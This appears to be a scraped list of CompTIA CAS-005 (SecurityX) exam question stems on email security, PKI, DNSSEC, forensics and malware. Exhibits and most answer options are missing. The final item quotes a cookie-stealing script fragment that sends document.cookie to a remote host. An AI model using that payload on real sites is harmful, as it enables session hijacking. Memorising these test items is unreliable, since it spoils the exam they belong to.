COMPTIA-SECURITYX

CompTIA's CAS-005 A security analyst needs to ensure email domains that send phishing attempts without previous communications are not delivered to mailboxes. The following email headers are being reviewed:Which of the following is the best action for the security analyst to take?

CompTIA's CAS-005 After remote desktop capabilities were deployed in the environment various vulnerabilities were noticed:• Exfiltration of intellectual property• Unencrypted files• Weak user passwordsWhich of the following is the best way to mitigate these vulnerabilities? (Choose two.) E. Enabling modem authentication that supports MFA F. Implementing a version control system G. Implementing a CMDB platform

CompTIA's CAS-005 A company recently experienced an incident in which an advanced threat actor was able to shim malicious code against the hardware stack of a domain controller. The forensic team cryptographically validated that both the underlying firmware of the box and the operating system had not been compromised. However, the attacker was able to exfiltrate information from the server using a steganographic technique within LDAP. Which of the following is the best way to reduce the risk of reoccurrence?

CompTIA's CAS-005 A company's security policy states that any publicly available server must be patched within 12 hours after a patch is released. A recent IIS zero-day vulnerability was discovered that affects all versions of the Windows Server OS:Which of the following hosts should a security analyst patch first once a patch is available? E. 5 F. 6

CompTIA's CAS-005 A company migrating to a remote work model requires that company-owned devices connect to a VPN before logging in to the device itself. The VPN gateway requires that a specific key extension is deployed to the machine certificates in the internal PKI. Which of the following best explains this requirement?

CompTIA's CAS-005 Which of the following best describes the challenges associated with widespread adoption of homomorphic encryption techniques?

CompTIA's CAS-005 During a security assessment using an EDR solution, a security engineer generates the following report about the assets in the system:After five days, the EDR console reports a blocked infection on the host 0WIN23 by a remote access Trojan. Which of the following most likely enabled the attempted infection?

CompTIA's CAS-005 A security engineer must ensure that sensitive corporate information is not exposed if a company laptop is stolen. Which of the following actions best addresses this requirement?

CompTIA's CAS-005 A global company’s Chief Financial Officer (CFO) receives a phone call from someone claiming to be the Chief Executive Officer (CEO). The caller claims to be stranded and in desperate need of money. The CFO is suspicious, but the caller’s voice sounds similar to the CEO’s. Which of the following best describes this type of attack?

CompTIA's CAS-005 A cloud engineer wants to configure mail security protocols to support email authenticity and enable the flow of email security information to a third-party platform for further analysis. Which of the following must be configured to achieve these requirements? (Choose two.) E. DNSSEC F. MX

CompTIA's CAS-005 A company is preparing to move a new version of a web application to production. No issues were reported during security scanning or quality assurance in the CI/CD pipeline. Which of the following actions should the company take next?

CompTIA's CAS-005 A DNS forward lookup zone named comptia.org must:• Ensure the DNS is protected from on-path attacks.• Ensure zone transfers use mutual authentication and are authenticated and negotiated.Which of the following should the security architect configure to meet these requirements? (Choose two). E. CNAME records F. SRV records

CompTIA's CAS-005 A security architect is implementing a SOAR solution in an organization’s cloud production environment to support detection capabilities. Which of the following will be the most likely benefit?

CompTIA's CAS-005 A cloud security architect has been tasked with finding a solution for hardening VMs. The solution must meet the following requirements:• Data needs to be stored outside of the VMs.• No unauthorized modifications to the VMs are allowed.• If a change needs to be done, a new VM needs to be deployed.Which of the following is the best solution?

CompTIA's CAS-005 A new, online file hosting service is being offered. The service has the following security requirements:• Threats to customer data integrity and availability should be remediated first.• The environment should be dynamic to match increasing customer demands.• The solution should not interfere with customers’ ability to access their data at anytime.• Security analysts should focus on high-risk items.Which of the following would best satisfy the requirements?

CompTIA's CAS-005 A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field. Which of the following should the security team recommend first?

CompTIA's CAS-005 A penetration tester discovers a condition that causes unexpected behavior in a web application. This results in the dump of the interpreter’s debugging information, which includes the interpreter’s version, full path of binary files, and the user ID running the process. Which of the following actions would best mitigate this risk?

CompTIA's CAS-005 To bring digital evidence in a court of law, the evidence must be:

CompTIA's CAS-005 A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location. Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?

CompTIA's CAS-005 A system of globally distributed certificate servers connected to HSMs provide certificate security services for a publicly available PKI. These services include OCSP, certificate revocation list issuance, and certificate signing/issuance. The HSMs are all physical devices. All other servers are virtualized. Each global site has a network load balancer, and the sites are configured to load balance between sites.Users report occasional but persistent log-on failures to different PKI-enabled websites. There is no apparent pattern to the failures. Some OCSP responses must be signed by the HSM. Each HSM is connected to a physical server containing multiple VMs for the local site with CAT 6e network cable. The backplane connecting the VMs is fiber based.Which of the following would best reduce the OCSP response time in order to rule out the connection between the certificate server and HSM as a cause of the user-reported issues?

CompTIA's CAS-005 While investigating an email server that crashed, an analyst reviews the following log files:Which of the following is most likely the root cause?

CompTIA's CAS-005 A company detects suspicious activity associated with inbound connections. Security detection tools are unable to categorize this activity. Which of the following is the best solution to help the company overcome this challenge?

CompTIA's CAS-005 An engineer wants to automate several tasks by running commands daily on a UNIX server. The engineer has only built-in, default tools available. Which of the following should the engineer use to best assist with this effort? (Choose two.) E. Bash F. Task Scheduler

CompTIA's CAS-005 During a forensic review of a cybersecurity incident, a security engineer collected a portion of the payload used by an attacker on a comprised web server. Given the following portion of the code:..asd...document.location="https://10.10.1.2/?"x“+document.cookie; ..12..fa..<>...ash214%621...41..2...8.8.Which of the following best describes this incident?